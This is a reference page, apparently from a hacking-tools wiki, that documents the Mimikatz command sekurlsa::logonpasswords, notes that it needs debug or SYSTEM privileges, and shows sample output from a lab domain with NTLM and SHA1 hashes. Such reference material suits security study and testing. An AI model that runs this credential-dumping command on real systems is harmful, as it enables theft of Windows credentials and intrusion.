The Hacker Tools
GitHub
Twitter
The Hacker Recipes
Searchโฆ
Introduction
Mimikatz ๐ฅ
General ๐ ๏ธ
Modules
crypto
dpapi
event
kerberos
lsadump
misc
net
privilege
process
rpc
sekurlsa
backupkeys
bootkey
cloudap
credman
dpapi
dpapisystem
ekeys
kerberos
krbtgt
livessp
logonpasswords
minidump
msv
process
pth
ssp
tickets
trust
tspkg
wdigest
service
sid
standard
token
ts
vault
๐ ๏ธ Impacket
๐ ๏ธ CrackMapExec ๐ฑ
๐ ๏ธ Exegol
Powered By
GitBook
logonpasswords
sekurlsa::logonpasswords
lists all available provider credentials. This usually shows recently logged on user and computer credentials.
This command requires elevated privileges (by previously running
privilege::debug
or by executing Mimikatz as the
NT-AUTHORITY\SYSTEM
account).
1
mimikatz # sekurlsa::logonpasswords
2
โ
3
Authentication Id : 0 ; 712960 (00000000:000ae100)
4
Session : Service from 0
5
User Name : MediaAdmin$
6
Domain : hacklab
7
Logon Server : DC
8
Logon Time : 9/26/2021 4:57:38 AM
9
SID : S-1-5-21-2725560159-1428537199-2260736313-1427
10
msv :
11
[00000003] Primary
12
* Username : MediaAdmin$
13
* Domain : hacklab
14
* NTLM : 35950fdc8d3d99b4136510414009662d
15
* SHA1 : 185535108abf1fc0287dedbaff210b77989251c8
16
* DPAPI : 73006d59c6adcf27da6e097787a6d1f9
17
tspkg :
18
wdigest :
19
* Username : MediaAdmin$
20
* Domain : hacklab
21
* Password : (null)
22
kerberos :
23
* Username : MediaAdmin$
24
* Domain : HACKLAB.LOCAL
25
* Password : (null)
26
ssp :
27
credman :
Copied!
Previous
livessp
Next
minidump
Last modified
6mo ago
Copy link